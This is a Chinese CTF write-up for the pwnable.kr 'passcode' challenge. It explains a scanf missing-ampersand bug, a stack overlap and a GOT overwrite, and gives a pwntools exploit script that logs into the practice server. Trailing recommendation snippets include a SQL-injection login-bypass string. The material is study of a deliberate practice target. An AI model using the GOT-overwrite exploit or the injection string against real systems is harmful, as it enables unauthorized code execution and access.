pwnable.kr第五题:passcode

最新推荐文章于 2023-10-06 18:19:26 发布
最新推荐文章于 2023-10-06 18:19:26 发布
阅读量200 收藏
点赞数
文章标签: 运维 python
原文链接:http://www.cnblogs.com/DennyT/p/11622413.html
版权

0x000打开环境

 

 

 

 

 ①查看源码:

 1 #include 
 2 #include 
 3 
 4 void login(){
 5     int passcode1;
 6     int passcode2;
 7 
 8     printf("enter passcode1 : ");
 9     scanf("%d", passcode1);
10     fflush(stdin);
11 
12     // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
13     printf("enter passcode2 : ");
14         scanf("%d", passcode2);
15 
16     printf("checking...\n");
17     if(passcode1==338150 && passcode2==13371337){
18                 printf("Login OK!\n");
19                 system("/bin/cat flag");
20         }
21         else{
22                 printf("Login Failed!\n");
23         exit(0);
24         }
25 }
26 
27 void welcome(){
28     char name[100];
29     printf("enter you name : ");
30     scanf("%100s", name);
31     printf("Welcome %s!\n", name);
32 }
33 
34 int main(){
35     printf("Toddler's Secure Login System 1.0 beta.\n");
36 
37     welcome();
38     login();
39 
40     // something after login...
41     printf("Now I can safely trust you that you have credential :)\n");
42     return 0;    
43 }

tips:

fflush(stdin)刷新标准输入缓冲区,把输入缓冲区里的东西丢弃[ 非标准]
fflush(stdout)刷新标准输出缓冲区,把输出缓冲区里的东西打印到标准输出设备上

②源码分析

  从17行的”passcode1==338150 && passcode2==13371337  “,可以看出passcode1和passcode只要满足相应的条件就可以执行“system("/bin/cat flag");”但是仔细看看,9和14行发现参数没有&符号,说明这个是一个指针,不是一个地址,函数会从栈中获取4个字节,漏洞就在这里,

  反编译passcode文件,打印login函数,

 

 

  发现全程都没有入栈的操作,说明name和passcode1在同一个栈内,而passcode2是canary,不能动它,能动的就只有passcode1了,怎么才能执行system("/bin/cat flag");呢,看到puts@plt这个标识,可以试试got表覆写技术(个人理解就是存储函数地址的对照表,和plt表一 一对应)。看看got表:

 

 

 可以利用的函数有printf,fflush,exit,因为在login函数中都有调用这三个函数,利用got表覆盖写成system函数的地址,那么只要这个函数被调用就可以得到flag。

 
0x001 漏洞的利用

  思路已经很清晰了,现在就是找到name的地址和passcode1的地址,计算他们之间的距离;printf/fflush/exit的入口地址;和system函数的地址。

 

 不难看出name的地址为ebp-x070

 

 passcode1的地址为ebp-0x10。

  name和passcode1相差96个字节,但是name开辟了100字节的空间,所以name后4个字节正好可以覆盖到passcode1指针的地址。这四个字节就写入printf/fflush/exit的入口地址,他们的入口地址可通过如下命令查看:

 

接着四个字节用system的地址覆盖got表的地址,system的地址在login函数中可以查看,地址为0x80485e3。这里覆盖got表的原理就是把passcode1的地址覆盖成fflush或者printf或者exit的地址,然后利用scanf函数把system的地址覆写过去。这样等调用fflush或者printf或者exit的就调用成了system。

0x002 payload构造

payload的构成96个任意字符,一个函数(printf/fflush/exit)的入口地址,system函数的地址

python脚本如下:

from pwn import *
pwn_ssh=ssh(host='pwnable.kr',user='passcode',password='guest',port=2222)
print (pwn_ssh.connected())
sh=pwn_ssh.process(executable="./passcode")
print (sh.recv())
sh.sendline('A'*96+'\x04\xa0\x04\x08'+'134514135')
print (sh.recvall())

 

转载于:https://www.cnblogs.com/DennyT/p/11622413.html

anlan5560
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwnable.krpasscode
Jason_ZhouYetao的博客
06-27 291
主要是的难点是GOT覆写技术的运用。这里推荐几篇文章有关栈溢出和GOT表和PLT表知识的文章。 栈溢出从入门到放弃(上) 栈溢出从入门到放弃(下) GOT表和PLT表知识详解 话不多说,先看正。 #include <stdio.h> #include <stdlib.h> void login(){ int passcode1; int passco...
pwnable.kr passcode
r250414958的博客
04-21 374
目来自pwnable.kr 里面的思路是通过学习别人的文章获得的,作为个人的学习记录一下 目是这样的 passcode SSH连接一下 看看有什么文件 可以看到有三个文件,其中 flag 只对创建者 passcode_pwn 和 root 可读,而我们登录的用户是 passcode(从连接时的用户名或使用 whoami 命令可以得知),因此是没有权限读这个文件的。passcode 对有所有...
pwnable-passcode
网安星空
01-30 2672
pwnable.kr是一个经典的CTF中PWN方向练习的专业网站,本文记录的目是passcode,主要考察的是函数scanf()的知识点。
pwnable.kr bof,flag,passcode,random
最新发布
weixin_51890658的博客
10-06 59
welcome函数中如果要输入100个字节的话,最后四位可以覆盖掉passcode1的地址,然后在第一个scanf输入时因为没有&符,所以可以把fflush的got表改为system("/bin/cat flag")的地址,然后再执行fllush函数时即可获得flag。大家先了解下异或,是一个很简单的运算符,例如 两个相同的数异或等于0 a^a=0 如果a^b=c 则a^c=b c^b=a。通过gdb分析,Welcome函数中name的输入可以用来覆盖passcode1的值。
乱七八糟的pwn入门(六)——5.passcode
Z_Pathon的博客
09-02 632
首先看目: 连上服务器,看一下这次的代码: #include <stdio.h> #include <stdlib.h> void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); scanf("%d", passcode1); fflus...
passcode:PASSCODE 创建一个模态对话框,像在通常的 Windows 对话框中一样返回用户密码输入。-matlab开发
06-01
答案 = 密码没有输入参数允许输入任何 ASCII 字符answer = PASSCODE('数字') 只允许数字作为输入字符 [0-9] answer = PASSCODE('信') 只允许字母作为输入字符 [a-z_A-Z] 答案 = 密码(<字符串>) 只允许使用指定...
iOS-Passcode:适用于 iOS 的密码应用
07-08
这意味着当 Passcode 被赋予相同的输入时,它会给出相同的输出。 已经使用生成的密码并需要检索它? 只需再次生成它。 由于该算法是单向的,因此在给定输出密码的情况下无法检索主密码。 它无处不在。 由
flutter-passcode:Flutter-密码锁定屏幕
05-02
import 'package:passcode_screen/passcode_screen.dart' ; 它能为您做什么? 只需创建一个漂亮的密码锁视图。 PasscodeScreen ( title : title, passwordEnteredCallback : _onPasscodeEntered, ...
Android代码-passcode
08-06
Passcode Android Passcode view Usage Adding to build.gradle for app level compile(group: 'in.ashish29agre.passcode', name: 'passcode', version: '1.0.0', ext: 'aar'); or compile '...
iphone-passcode-unlocker.exe
11-20
iphone-passcode-unlocker.exe
pwnable.kr之otp
Jason_ZhouYetao的博客
07-15 699
这个可以说是考察一个全新的知识点,不是栈溢出什么的,只是限制创建文件的大小,具体的ulimit命令可以参考这个网站 ulimit命令详解 打开目的otp.c发现是对于passcode进行比较所以对于其创建文件的大小限制为0就可以了; ulimit -f 执行这个命令就可以了,之后写一个简单的python脚本,如下: #!/user/bin/python import subproc...
[pwnable.kr]passcode
iekuil的博客
10-03 279
->plt[1]第一条指令jmp *got[3] --> plt[1]第二条指令压栈 --> plt[1]第三条指令jmp plt[0] --> plt[0]第一条指令再压栈 --> plt[0]第二条指令jmp *got[2] --> 进入动态链接函数 --> 回写got表&调用目标函数。got[3],即804a000处实际存的值是8048426,即plt[1]中第二条指令的位置,除了plt[0]和got[0]、got[1]、got[2]有特殊作用外,
pwnable.kr第五 passcode 第六random
weixin_42877778的博客
02-07 375
passcode random讲解
pwnable.kr wp passcode
fa1c4的blog
01-17 217
目 Mommy told me to make a passcode based login system. My initial C code was compiled without any error! Well, there was some compiler warning, but who cares about that? ssh passcode@pwnable.kr -p2222 (pw:guest) 解 #include <stdio.h> #include &lt
pwnable.kr-passcode
qq_35661990的博客
09-18 555
这道的难点在于GOT表覆写,理解了GOT表和PLT表的关系就比较好做了。 函数在调用printf等函数的时候需要访问PLT表,而PLT表中储存的是GOT表对应项的地址。 另外一点就是scanf的参数如果没有加&amp;地址符,就会把参数所在栈内的4个字节(我认为是因为目中要传入%d是四字节的int型吧)当作地址,然后把缓冲区的数据输入进去。(在IDA中看,就是有加地址符,程序会执行lea指...
pwnable.krpasscode
think_ycx的专栏
07-09 530
下载程序scp -P 2222 -p passcode@pwnable.kr:/home/passcode/* ./漏洞信息程序main函数中,welcome和login存在栈复用,welcome调用gets向ebp-0x70读入100个字符。 login中scanf没有取地址,因此会把[ebp-10h]和[ebp-0xch]的内容当成要写入的地址。在welcome中,我们有一次布置数据的机会,可...
pwnable.kr - passcode
ACdream
10-12 506
pwnable.kr passcode
(1)如果执行数据库的查询语句为:$sql="select * from users where username = ' ".$username." ' and passcode = ' ".$passwd." ' "; 该如何构造万能密码?
05-18
在该 SQL 查询语句中,$username 和 $passwd 都...select * from users where username = '' or 1=1#' and passcode = '' ``` 由于 1=1 永远为真,所以这个查询语句将会返回所有用户记录,无论用户名和密码是否匹配。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值